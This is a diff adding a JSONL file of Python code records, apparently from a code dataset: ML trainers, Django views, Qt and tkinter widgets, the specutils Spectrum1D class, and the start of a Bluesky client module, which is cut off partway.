diff --git "a/2621.jsonl" "b/2621.jsonl" new file mode 100644--- /dev/null +++ "b/2621.jsonl" @@ -0,0 +1,679 @@ +{"seq_id":"465474907","text":"# CNN_BC_Trainer\n\nimport sys, os\nsys.path.insert(1, os.path.join(sys.path[0], '../modules'))\nfrom NN_Trainer import NN_Trainer\n\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\n\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport io\nimport itertools\n\nclass CNN_BC_Trainer(NN_Trainer):\n\n def __init__(self,\n network,\n Data_Creator, # Class\n num_epochs = 100,\n batch_size = 32,\n log_dir = '../logs/',\n model_save_interval = 25,\n pretrained_model_path = None,\n metric_names = ['costs', 'accuracies'],\n sample_keep_prob = 0.80,\n conv_keep_prob = 0.9,\n verbose = True,\n class_names = ['pos', 'neg']):\n \n NN_Trainer.__init__(self,\n network = network,\n Data_Creator = Data_Creator,\n num_epochs = num_epochs,\n batch_size = batch_size,\n log_dir = log_dir,\n model_save_interval = model_save_interval,\n pretrained_model_path = pretrained_model_path,\n metric_names = metric_names,\n verbose = verbose)\n \n\n self.sample_keep_prob = sample_keep_prob\n self.conv_keep_prob = conv_keep_prob\n self.class_names = class_names\n \n def train(self):\n \n self.save_params()\n\n costs = []\n accuracies = []\n\n tf.reset_default_graph()\n \n self._network.create_graph()\n saver = tf.train.Saver()\n\n with tf.Session() as session:\n \n if self.pretrained_model_path == None:\n session.run(tf.global_variables_initializer())\n \n else:\n saver.restore(session, self.pretrained_model_path)\n\n archive_loc = self.log_dir + self._network.name\n training_writer = tf.summary.FileWriter(archive_loc + '/training', session.graph)\n testing_writer = tf.summary.FileWriter(archive_loc + '/testing', session.graph)\n self.model_save_location = archive_loc + '/trained_model.ckpt' \n \n \n self._msg = '\\rtraining';self._vprint(self._msg)\n\n try:\n for epoch in range(self.num_epochs):\n \n \n\n training_inputs, training_labels = self._train_batcher.get_data(); self._train_batcher.gen_data()\n testing_inputs, testing_labels = self._test_batcher.get_data(); self._test_batcher.gen_data() \n\n training_labels = np.asarray(training_labels)\n testing_labels = np.asarray(testing_labels)\n \n # if the division here has a remainde some values are just truncated\n batch_size = self.batch_size\n num_entries = training_inputs.shape[0]\n\n for j in range(int(num_entries/batch_size)):\n self._msg = '\\repoch'\n self._msg += '- {:5.0f}/{:5.0f}'.format(epoch + 1,self.num_epochs)\n self._msg += ' - batch: {:4.0f}/{:4.0f}'.format(j + 1, int(num_entries/batch_size))\n if epoch != 0:\n self._msg += ' - (Training, Testing) - '.format(epoch)\n self._msg += \" costs: ({:0.4f}, {:0.4f})\".format(training_cost, testing_cost)\n self._msg += \" accss: ({:2.2f}, {:2.2f})\".format(training_acc, testing_acc)\n self._vprint(self._msg); \n\n training_inputs_batch = training_inputs[j*batch_size:(j + 1)*batch_size].reshape(-1,1,1024,1)\n training_labels_batch = training_labels[j*batch_size:(j + 1)*batch_size].reshape(-1,2)\n\n feed_dict = {self._network.X: training_inputs_batch,\n self._network.labels: training_labels_batch,\n self._network.sample_keep_prob : self.sample_keep_prob,\n self._network.conv_keep_prob : self.conv_keep_prob,\n self._network.is_training : True}\n\n session.run([self._network.optimizer], feed_dict = feed_dict) \n \n train_feed_dict = {self._network.X: training_inputs.reshape(-1,1,1024,1),\n self._network.labels: training_labels.reshape(-1,2),\n self._network.sample_keep_prob : 1.,\n self._network.conv_keep_prob : 1.,\n self._network.is_training : False}\n\n train_predicts = session.run([self._network.predictions], train_feed_dict)\n\n train_feed_dict[self._network.image_buf] = self.plt_confusion_matrix(training_labels.reshape(-1,2), train_predicts)\n\n training_cost, training_acc, training_summary = session.run([self._network.cost,\n self._network.accuracy,\n self._network.summary],\n feed_dict = train_feed_dict) \n\n training_writer.add_summary(training_summary, epoch)\n training_writer.flush() \n \n\n test_feed_dict = {self._network.X: testing_inputs.reshape(-1,1,1024,1),\n self._network.labels: testing_labels.reshape(-1,2),\n self._network.sample_keep_prob : 1.,\n self._network.conv_keep_prob : 1.,\n self._network.is_training : False} \n \n test_predicts = session.run([self._network.predictions], test_feed_dict)\n\n test_feed_dict[self._network.image_buf] = self.plt_confusion_matrix(testing_labels.reshape(-1,2), test_predicts) \n\n\n testing_cost, testing_acc, testing_summary = session.run([self._network.cost,\n self._network.accuracy,\n self._network.summary],\n feed_dict = test_feed_dict)\n\n testing_writer.add_summary(testing_summary, epoch)\n testing_writer.flush()\n \n costs.append((training_cost, testing_cost))\n accuracies.append((training_acc, testing_acc))\n \n if (epoch + 1) % self.model_save_interval == 0:\n saver.save(session, self.model_save_location, epoch + 1)\n \n self.msg = ''\n except KeyboardInterrupt:\n self._msg = ' TRAINING INTERUPPTED' # this never prints I dont know why\n pass\n\n self._msg += '\\rtraining ended'; self._vprint(self._msg)\n \n training_writer.close()\n testing_writer.close()\n\n\n session.close()\n self._msg += ' - session closed'; self._vprint(self._msg)\n self._msg = ''\n\n self._metrics = [costs, accuracies]\n self.save_metrics()\n\n\n\n def plt_confusion_matrix(self, labels, pred, normalize=False, title='Confusion matrix'):\n \"\"\"\n Given one-hot encoded labels and preds, displays a confusion matrix.\n Arguments:\n `labels`:\n The ground truth one-hot encoded labels.\n `pred`:\n The one-hot encoded labels predicted by a model.\n `normalize`:\n If True, divides every column of the confusion matrix\n by its sum. This is helpful when, for instance, there are 1000\n 'A' labels and 5 'B' labels. Normalizing this set would\n make the color coding more meaningful and informative.\n \"\"\"\n labels = [label.argmax() for label in np.asarray(labels).reshape(-1,2)] # bc\n pred = [label.argmax() for label in np.asarray(pred).reshape(-1,2)] #bc\n\n classes = self.class_names\n\n cm = confusion_matrix(labels, pred)\n\n #if normalize:\n cm = cm.astype('float')*100 / cm.sum(axis=1)[:, np.newaxis]\n cm = np.nan_to_num(cm, copy=True)\n cm = cm.astype('int')\n\n fig, ax = plt.subplots(figsize = (5,5), dpi = 144)\n im = ax.imshow(cm, interpolation='nearest', aspect='auto', cmap=plt.cm.Oranges, vmin = 0, vmax = 100)\n ax.set_title(title)\n cbar = fig.colorbar(im)\n tick_marks = np.arange(len(classes))\n ax.set_xticks(tick_marks)\n ax.set_xticklabels(classes)\n ax.set_yticks(tick_marks)\n ax.set_yticklabels(classes)\n\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n #s = '{:2.0}'.format(cm[i, j]) if cm[i,j] >= 1 else '.'\n ax.text(j, i, format(cm[i, j], 'd') if cm[i,j]!=0 else '.',\n horizontalalignment=\"center\", fontsize=15, verticalalignment='center', color= \"black\")\n\n # plt.show()\n buf = io.BytesIO()\n fig.savefig(buf, format='png', dpi = 144)\n plt.close(fig)\n buf.seek(0)\n\n return buf.getvalue()","sub_path":"aas/Estimating Delays/nn/network_trainers/CNN_BC_Trainer.py","file_name":"CNN_BC_Trainer.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"397146723","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom forms import UserForm, PostForm\nfrom models import *\n\n# Create your views here.\ndef display_page(request):\n\tposts = Post.objects.all()\n\tusers = User.objects.all()\n\tcontext = {'userform':UserForm, 'postform':PostForm}\n\treturn render(request, 'page.html', context)\n\ndef get_name(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = UserForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n name_from_form = request.POST['name']\n email_from_form = request.POST['email']\n score_from_form = request.POST['score']\n user = User(name=name_from_form, email=email_from_form)\n user.score = score_from_form\n user.save()\n # process the data in form.cleaned_data as required\n # ...\n # redirect to a new URL:\n return HttpResponse('Thanks!!!!!!!!!')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = UserForm()\n\n return render(request, 'page.html', {'form':form})\n\ndef create_post(request):\n if request.method == 'POST':\n form=PostForm(request.POST)\n if form.is_valid():\n title_from_form = request.POST['title']\n text_from_form = request.POST['text']\n tag_from_form = request.POST['tag']\n post = Post(title = title_from_form, text=text_from_form, tag=tag_from_form)\n post.save()\n\n return HttpResponse('Thanks!!')\n else:\n form = PostForm()\n\n return render(request, 'page.html', {'form':form})\n\n\n","sub_path":"agora/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152754964","text":"# IMPORT LIBRARIES\nimport tkinter\nfrom tkinter import messagebox\n\n\n# APPLICATION ELEMENTS\n# **************************************************\ntop = tkinter.Tk()\n\n\n# ACTION LISTENERS\n# **************************************************\ndef helloCallBack():\n messagebox.showinfo( \"Hello Python\", \"Hello World\")\n\nB = tkinter.Button(top, text =\"Hello\", command = helloCallBack)\n\n\n# LAYOUT GENERATION\n# **************************************************\nB.pack()\ntop.mainloop()","sub_path":"GUI/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"331249628","text":"import logging\n\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.nddata import NDDataRef\nfrom astropy.utils.decorators import lazyproperty\nfrom astropy.nddata import NDUncertainty\nfrom ..wcs import WCSWrapper, WCSAdapter\nfrom .spectrum_mixin import OneDSpectrumMixin\n\n__all__ = ['Spectrum1D']\n\n__doctest_skip__ = ['Spectrum1D.spectral_resolution']\n\n\nclass Spectrum1D(OneDSpectrumMixin, NDDataRef):\n \"\"\"\n Spectrum container for 1D spectral data.\n\n Parameters\n ----------\n flux : `astropy.units.Quantity` or astropy.nddata.NDData`-like\n The flux data for this spectrum.\n spectral_axis : `astropy.units.Quantity`\n Dispersion information with the same shape as the last (or only)\n dimension of flux.\n wcs : `astropy.wcs.WCS` or `gwcs.wcs.WCS`\n WCS information object.\n velocity_convention : {\"doppler_relativistic\", \"doppler_optical\", \"doppler_radio\"}\n Convention used for velocity conversions.\n rest_value : `~astropy.units.Quantity`\n Any quantity supported by the standard spectral equivalencies\n (wavelength, energy, frequency, wave number). Describes the rest value\n of the spectral axis for use with velocity conversions.\n uncertainty : `~astropy.nddata.NDUncertainty`\n Contains uncertainty information along with propagation rules for\n spectrum arithmetic. Can take a unit, but if none is given, will use\n the unit defined in the flux.\n meta : dict\n Arbitrary container for any user-specific information to be carried\n around with the spectrum container object.\n \"\"\"\n def __init__(self, flux=None, spectral_axis=None, wcs=None,\n velocity_convention=None, rest_value=None, *args, **kwargs):\n # If the flux (data) argument is a subclass of nddataref (as it would\n # be for internal arithmetic operations), avoid setup entirely.\n if isinstance(flux, NDDataRef):\n self._velocity_convention = flux._velocity_convention\n self._rest_value = flux._rest_value\n\n super(Spectrum1D, self).__init__(flux)\n return\n\n # Ensure that the flux argument is an astropy quantity\n if flux is not None and not isinstance(flux, u.Quantity):\n raise ValueError(\"Flux must be a `Quantity` object.\")\n\n # In cases of slicing, new objects will be initialized with `data`\n # instead of `flux`. Ensure we grab the `data` argument.\n if flux is None and 'data' in kwargs:\n flux = kwargs.pop('data')\n\n # Ensure that the unit information codified in the quantity object is\n # the One True Unit.\n kwargs.setdefault('unit', flux.unit if isinstance(flux, u.Quantity)\n else kwargs.get('unit'))\n\n # Attempt to parse the spectral axis. If none is given, try instead to\n # parse a given wcs. This is put into a GWCS object to\n # then be used behind-the-scenes for all specutils operations.\n if spectral_axis is not None:\n # Ensure that the spectral axis is an astropy quantity\n if not isinstance(spectral_axis, u.Quantity):\n raise ValueError(\"Spectral axis must be a `Quantity` object.\")\n\n wcs = WCSWrapper.from_array(spectral_axis)\n elif wcs is not None:\n if not issubclass(wcs.__class__, WCSAdapter):\n wcs = WCSWrapper(wcs)\n elif isinstance(flux, float) or isinstance(flux, int) or isinstance(flux, np.ndarray):\n # In the case where the arithmetic operation is being performed with\n # a single float, int, or array object, just go ahead and ignore wcs\n # requirements\n super(Spectrum1D, self).__init__(data=flux)\n return\n else:\n # If no wcs and no spectral axis has been given, raise an error\n raise LookupError(\"No WCS object or spectral axis information has \"\n \"been given. Please provide one.\")\n\n self._velocity_convention = velocity_convention\n\n if rest_value is None:\n if wcs.rest_frequency != 0:\n self._rest_value = wcs.rest_frequency * u.Hz\n elif wcs.rest_wavelength != 0:\n self._rest_value = wcs.rest_wavelength * u.AA\n else:\n self._rest_value = 0 * u.AA\n else:\n self._rest_value = rest_value\n\n if not isinstance(self._rest_value, u.Quantity):\n logging.info(\"No unit information provided with rest value. \"\n \"Assuming units of spectral axis ('%s').\",\n spectral_axis.unit)\n self._rest_value = u.Quantity(rest_value, spectral_axis.unit)\n elif not self._rest_value.unit.is_equivalent(u.AA) and not self._rest_value.unit.is_equivalent(u.Hz):\n raise u.UnitsError(\"Rest value must be energy/wavelength/frequency equivalent.\")\n\n super(Spectrum1D, self).__init__(\n data=flux.value if isinstance(flux, u.Quantity) else flux,\n wcs=wcs, **kwargs)\n\n @property\n def frequency(self):\n \"\"\"\n The frequency as a `~astropy.units.Quantity` in units of GHz\n \"\"\"\n return self.spectral_axis.to(u.GHz, u.spectral())\n\n @property\n def wavelength(self):\n \"\"\"\n The wavelength as a `~astropy.units.Quantity` in units of Angstroms\n \"\"\"\n return self.spectral_axis.to(u.AA, u.spectral())\n\n @property\n def energy(self):\n \"\"\"\n The energy of the spectral axis as a `~astropy.units.Quantity` in units\n of eV.\n \"\"\"\n return self.spectral_axis.to(u.eV, u.spectral())\n\n @property\n def photon_flux(self):\n \"\"\"\n The flux density of photons as a `~astropy.units.Quantity`, in units of\n photons per cm^2 per second per spectral_axis unit\n \"\"\"\n flux_in_spectral_axis_units = self.flux.to(u.W * u.cm**-2 * self.spectral_axis.unit**-1, u.spectral_density(self.spectral_axis))\n photon_flux_density = flux_in_spectral_axis_units / (self.energy / u.photon)\n return photon_flux_density.to(u.photon * u.cm**-2 * u.s**-1 *\n self.spectral_axis.unit**-1)\n\n @lazyproperty\n def bin_edges(self):\n return self.wcs.bin_edges()\n\n @property\n def shape(self):\n return self.flux.shape\n\n @staticmethod\n def _compare_wcs(this_operand, other_operand):\n \"\"\"\n NNData arithmetic callable to determine if two wcs's are compatible.\n \"\"\"\n # If the other operand is a simple number or array, allow the operations\n if (isinstance(other_operand, float) or isinstance(other_operand, int)\n or isinstance(other_operand, np.ndarray)):\n return True\n\n # First check if units are equivalent, if so, create a new spectrum\n # object with spectral axis in compatible units\n other_wcs = other_operand.wcs.with_spectral_unit(\n this_operand.wcs.spectral_axis_unit,\n rest_value=this_operand._rest_value,\n velocity_convention=this_operand._velocity_convention)\n\n if other_wcs is None:\n return False\n\n # Check if the shape of the axes are compatible\n if this_operand.spectral_axis.shape != other_operand.spectral_axis.shape:\n logging.error(\"Shape of spectral axes between operands must be \"\n \"equivalent.\")\n return False\n\n # And that they cover the same range\n if (this_operand.spectral_axis[0] != other_operand.spectral_axis[0] or\n this_operand.spectral_axis[-1] != other_operand.spectral_axis[-1]):\n logging.error(\"Spectral axes between operands must cover the \"\n \"same range. Interpolation may be required.\")\n return False\n\n # Check if the delta dispersion is equivalent between the two axes\n if not np.array_equal(np.diff(this_operand.spectral_axis),\n np.diff(other_operand.spectral_axis)):\n logging.error(\"Delta dispersion of spectral axes of operands \"\n \"must be equivalent. Interpolation may be required.\")\n return False\n\n return True\n\n def __add__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other, unit=self.unit)\n\n return self.add(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __sub__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other, unit=self.unit)\n\n return self.subtract(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __mul__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.multiply(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __div__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.divide(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def __truediv__(self, other):\n if not isinstance(other, NDDataRef):\n other = u.Quantity(other)\n\n return self.divide(\n other, compare_wcs=lambda o1, o2: self._compare_wcs(self, other))\n\n def _format_array_summary(self, label, array):\n if len(array) > 0:\n mean = np.mean(array)\n s = \"{:17} [ {:.5}, ..., {:.5} ], mean={:.5}\"\n return s.format(label+':', array[0], array[-1], mean)\n else:\n return \"{:17} [ ], mean= n/a\".format(label+':')\n\n def __str__(self):\n result = \"Spectrum1D \"\n # Handle case of single value flux\n if self.flux.ndim == 0:\n result += \"(length=1)\\n\"\n return result + \"flux: {}\".format(self.flux)\n\n # Handle case of multiple flux arrays\n result += \"(length={})\\n\".format(len(self.spectral_axis))\n if self.flux.ndim > 1:\n for i, flux in enumerate(self.flux):\n label = 'flux{:2}'.format(i)\n result += self._format_array_summary(label, flux) + '\\n'\n else:\n result += self._format_array_summary('flux', self.flux) + '\\n'\n # Add information about spectral axis\n result += self._format_array_summary('spectral axis', self.spectral_axis)\n # Add information about uncertainties if available\n if self.uncertainty:\n result += \"\\nuncertainty: [ {}, ..., {} ]\".format(\n self.uncertainty[0], self.uncertainty[-1])\n return result\n\n def __repr__(self):\n inner_str = \"flux={}, spectral_axis={}\".format(repr(self.flux),\n repr(self.spectral_axis))\n\n if self.uncertainty is not None:\n inner_str += \", uncertainty={}\".format(repr(self.uncertainty))\n\n result = \"\".format(inner_str)\n\n return result\n\n\n def spectral_resolution(self, true_dispersion, delta_dispersion, axis=-1):\n \"\"\"Evaluate the probability distribution of the spectral resolution.\n\n Examples\n --------\n\n To tabulate a binned resolution function at 6000A covering +/-10A in\n 0.2A steps:\n\n >>> R = spectrum1d.spectral_resolution(\n ... 6000 * u.Angstrom, np.linspace(-10, 10, 51) * u.Angstrom)\n >>> assert R.shape == (50,)\n >>> assert np.allclose(R.sum(), 1.)\n\n To build a sparse resolution matrix for true wavelengths 4000-8000A\n in 0.1A steps:\n\n >>> R = spectrum1d.spectral_resolution(\n ... np.linspace(4000, 8000, 40001)[:, np.newaxis] * u.Angstrom,\n ... np.linspace(-10, +10, 201) * u.Angstrom)\n >>> assert R.shape == (40000, 200)\n >>> assert np.allclose(R.sum(axis=1), 1.)\n\n Parameters\n ----------\n true_dispersion : `~astropy.units.Quantity`\n True value(s) of dispersion for which the resolution should be\n evaluated.\n delta_dispersion : `~astropy.units.Quantity`\n Array of (observed - true) dispersion bin edges to integrate the\n resolution probability density over.\n axis : int\n Which axis of ``delta_dispersion`` contains the strictly increasing\n dispersion values to interpret as bin edges. The dimension of\n ``delta_dispersion`` along this axis must be at least two.\n\n Returns\n -------\n numpy array\n Array of dimensionless probabilities calculated as the integral of\n P(observed | true) over each bin in (observed - true). The output\n shape is the result of broadcasting the input shapes.\n\n \"\"\"\n pass\n","sub_path":"specutils/spectra/spectrum1d.py","file_name":"spectrum1d.py","file_ext":"py","file_size_in_byte":12955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"48175125","text":"from PySide2.QtWidgets import QProgressBar,QMessageBox\nfrom PySide2.QtGui import QPainter,QPainterPath,QPen\nfrom PySide2 import QtGui, QtCore\nfrom PySide2.QtCore import Signal\n\nOK_STYLE='''\n QProgressBar {\n border: 4px solid white;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: white;\n margin: 4px;\n }'''\nWARNING_STYLE='''\n QProgressBar {\n border: 4px solid yellow;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: yellow;\n margin: 4px;\n }'''\nLOW_STYLE='''\n QProgressBar {\n border: 4px solid red;\n background-color: rgb(41, 45, 56);\n margin-top: 12px;\n }\n QProgressBar:horizontal {\n height: 60px;\n width: 120px;\n margin-right: 12px;\n }\n QProgressBar:vertical {\n height: 120px;\n width: 60px;\n margin-left: 12px;\n }\n QProgressBar::chunk {\n background-color: red;\n margin: 4px;\n }'''\n\n\nclass Battery(QProgressBar):\n def __init__(self, *args, **kwargs):\n super(Battery, self).__init__(*args, **kwargs)\n self.setTextVisible(False)\n self.charging = False\n self.state = \"Ok\"; #Puede ser warning o low\n self.voltOfCharge = {100: 12.73, 90: 12.62, 80: 12.5, 70: 12.37, 60: 12.24, 50: 12.1, 40: 11.96, 30: 11.81,\n 20: 11.66, 10: 11.51}\n self.setMaximum(100)\n self.setMinimum(0)\n self.color= QtCore.Qt.white\n self.setValue(100)\n self.setStyleSheet(OK_STYLE)\n\n def level_to_volt(self,level):\n voltage=11.4;\n for key in self.voltOfCharge:\n if(key<=level):\n voltage = (level%10)/10 * (self.voltOfCharge[key + 10] - self.voltOfCharge[key]) + self.voltOfCharge[key]\n return voltage\n def volt_to_level(self,volt):\n level=0;\n res = 1 ##Si la resolución de la batería es de 10\n\n for key in self.voltOfCharge:\n if(self.voltOfCharge[key]<=volt):\n if(res==10):\n level=key\n if (res == 1): #No ta checkeado\n if(key<100):\n if(volt>self.voltOfCharge[key]):\n level=int((volt-self.voltOfCharge[key])/(self.voltOfCharge[key+10]-self.voltOfCharge[key])*10 + key);\n else:\n level=key;\n else:\n level=100;\n break;\n return level\n def reset(self):\n self.state=\"Ok\"\n self.setValue(100)\n def setBatLevel(self, voltage):\n b_level=self.volt_to_level(voltage)\n self.setValue(b_level)\n if (b_level >= 50 and not self.state == \"Ok\"):\n self.state=\"Ok\"\n # self.color = QtCore.Qt.white\n # self.setStyleSheet(OK_STYLE)\n if(b_level <= 30 and b_level > 15 and self.state == \"Ok\"):\n self.state = \"Warning\"\n # self.color = QtCore.Qt.yellow\n # self.setStyleSheet(WARNING_STYLE)\n if (b_level <= 15 and not self.state == \"Low\"):\n self.state = \"Low\"\n # self.color = QtCore.Qt.red\n # self.setStyleSheet(LOW_STYLE)\n self.repaint()\n\n def setCharging(self, state):\n self.charging = state\n self.repaint()\n\n def paintEvent(self, event):\n super(Battery, self).paintEvent(event)\n qp = QPainter(self)\n qp.setPen(QtCore.Qt.NoPen);\n qp.setBrush(self.color)\n w, h = self.width(), self.height()\n if self.orientation() == QtCore.Qt.Horizontal:\n qp.drawRect(w, 12 + h / 4, -12, h / 2 - 12)\n dx, dy = 0, 12\n else:\n qp.drawRect(12 + w / 4, 0, w / 2 - 12, 12)\n dx, dy = 12, 0\n\n qp.setPen(QtCore.Qt.gray)\n font=qp.font()\n font.setPointSize(font.pointSize()*1.5)\n qp.setFont(font)\n qp.drawText(self.rect().adjusted(dx, dy, 0, 0), QtCore.Qt.AlignCenter, self.text())\n qp.setPen(QtCore.Qt.NoPen)\n\n if self.charging:\n qp.setBrush(self.parent().palette().window())\n qp.setBrush(self.color)\n path = QPainterPath()\n if self.orientation() == QtCore.Qt.Horizontal:\n qp.drawRect(0, 0, 12, h)\n path.moveTo(12, h)\n path.lineTo(12, 12 + h / 3)\n path.quadTo(22, 12 + h / 3, 22, 24)\n path.lineTo(22, 14)\n path.lineTo(2, 14)\n path.lineTo(2, 24)\n path.quadTo(2, 12 + h / 3, 12, 12 + h / 3)\n path.moveTo(7, 12);\n path.lineTo(7, 0)\n path.moveTo(17, 12);\n path.lineTo(17, 0)\n else:\n qp.drawRect(0, h, w, -12)\n path.moveTo(w, h - 12)\n path.lineTo(12 + w / 3, h - 12)\n path.quadTo(12 + w / 3, h - 22, 24, h - 22)\n path.lineTo(14, h - 22)\n path.lineTo(14, h - 2)\n path.lineTo(24, h - 2)\n path.quadTo(12 + w / 3, h - 2, 12 + w / 3, h - 12)\n path.moveTo(12, h - 7);\n path.lineTo(0, h - 7)\n path.moveTo(12, h - 17);\n path.lineTo(0, h - 17)\n\n pen = QPen(qp.brush(), 12, QtCore.Qt.SolidLine, QtCore.Qt.SquareCap, QtCore.Qt.MiterJoin)\n qp.strokePath(path, pen)\n pen.setWidth(4);\n pen.setColor(self.color);\n qp.setPen(pen)\n #qp.setBrush(self.palette().window())\n qp.setBrush(self.color)\n qp.drawPath(path)\n","sub_path":"v2/Battery.py","file_name":"Battery.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"96861977","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a list node\n def detectCycle(self, head):\n stk=[]\n tmp=head\n while tmp:\n if stk.count(tmp)>0:\n return tmp\n stk.append(tmp)\n tmp=tmp.next\n return None\n ","sub_path":"linklistcycle2.py","file_name":"linklistcycle2.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"320018357","text":"\"\"\" Like logistic_regression_tf_full.py but the subgraph for performing a step of the \ngradient descent optimizer is added using a tensorflow function.\n\n\"\"\"\n\nfrom keras.layers import Input, Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.models import Model\nimport keras\n\nfrom load_mnist import load_mnist\nimport numpy as np\nimport math\n\n\ndef main():\n log_dir = '/tmp/mnist/nn_keras'\n\n train_data, validate_data, test_data = load_mnist('mnist.pkl.gz')\n\n \n # design matrix of shape (num_examples, input_width, input_width, channels=1);\n # reshape flattened sample vector into a samples image\n input_width = 28\n x_all = np.reshape(train_data[0], (-1, input_width, input_width, 1))\n num_examples = x_all.shape[0]\n \n # label matrix (N x 1)\n c_all = train_data[1]\n \n K = 10 # number of classes\n # target variable (num_examples, K)\n t_all = keras.utils.to_categorical(c_all)\n \n # the same for the test data\n test_x = np.reshape(test_data[0], (-1, input_width, input_width, 1))\n test_c = test_data[1]\n test_t = keras.utils.to_categorical(test_c, K)\n \n\n batch_size = 128\n # learning rate\n eta = 0.05\n max_epochs = 200\n\n # We use ReLU neurons for all but the last layers\n relu = keras.activations.relu\n\n # the network layers\n x = Input(shape=(input_width, input_width, 1))\n\n h_c1 = Conv2D(32, (5, 5), activation=relu)(x)\n h_p1 = MaxPooling2D(pool_size=(2,2))(h_c1)\n\n h_c2 = Conv2D(64, (5, 5), activation=relu)(h_p1)\n h_p2 = MaxPooling2D(pool_size=(2,2))(h_c2)\n\n h_p2_flat = Flatten()(h_p2)\n\n h_d1 = Dense(1024, activation=relu)(h_p2_flat)\n\n h_d1_dropout = Dropout(0.5)(h_d1)\n\n y = Dense(K, activation=keras.activations.softmax)(h_d1_dropout)\n\n # Define the model and create the computational graph.\n model = Model(inputs=x, outputs=y)\n\n print('---------------------------------')\n for l in model.layers:\n print(l.name)\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.SGD(lr=eta),\n metrics=[keras.metrics.categorical_accuracy])\n\n # Train the model.\n model.fit(x_all, t_all,\n batch_size=batch_size,\n epochs=max_epochs,\n validation_data=(test_x, test_t), \n #callbacks=[keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=10)]\n )\n\n # Evaluate the model\n score = model.evaluate(test_x, test_t, verbose=0)\n\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])\n\n\nmain()\n","sub_path":"mnist/cnn_2.py","file_name":"cnn_2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"244105344","text":"\"\"\"Bluesky source class.\n\nhttps://bsky.app/\nhttps://atproto.com/lexicons/app-bsky-actor\nhttps://github.com/bluesky-social/atproto/tree/main/lexicons/app/bsky\n\"\"\"\nimport copy\nimport json\nimport logging\nimport re\nfrom pathlib import Path\nimport urllib.parse\n\nfrom lexrpc import Client\nfrom oauth_dropins.webutil import util\n\nfrom . import as1\nfrom .source import FRIENDS, Source, OMIT_LINK\n\nlogger = logging.getLogger(__name__)\n\n# list of dict JSON app.bsky.* lexicons. _load_lexicons lazy loads them from the\n# lexicons/ dir.\nLEXICONS = []\n\n# via https://atproto.com/specs/handle\nHANDLE_REGEX = (\n r'([a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\\.)+'\n r'[a-zA-Z]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?$'\n)\nHANDLE_PATTERN = re.compile(r'^' + HANDLE_REGEX)\nDID_WEB_PATTERN = re.compile(r'^did:web:' + HANDLE_REGEX)\n\ndef _maybe_load_lexicons():\n if not LEXICONS:\n for filename in (Path(__file__).parent / 'lexicons').glob('**/*.json'):\n with open(filename) as f:\n LEXICONS.append(json.load(f))\n\n# Maps AT Protocol NSID collections to path elements in bsky.app URLs.\n# Used in at_uri_to_web_url.\n#\n# eg for mapping a URI like:\n# at://did:plc:z72i7hd/app.bsky.feed.generator/mutuals\n# to a frontend URL like:\n# https://bsky.app/profile/did:plc:z72i7hdynmk6r22z27h6tvur/feed/mutuals\nCOLLECTIONS = {\n 'app.bsky.feed.post': 'post',\n 'app.bsky.feed.generator': 'feed',\n}\n\n\ndef url_to_did_web(url):\n \"\"\"Converts a URL to a did:web.\n\n In AT Proto, only hostname-based web DIDs are supported.\n Paths are not supported, and will be discarded.\n\n Examples:\n * 'https://foo.com' => 'did:web:foo.com'\n * 'https://foo.com:3000' => 'did:web:foo.com'\n * 'https://foo.bar.com/baz/baj' => 'did:web:foo.bar.com'\n\n 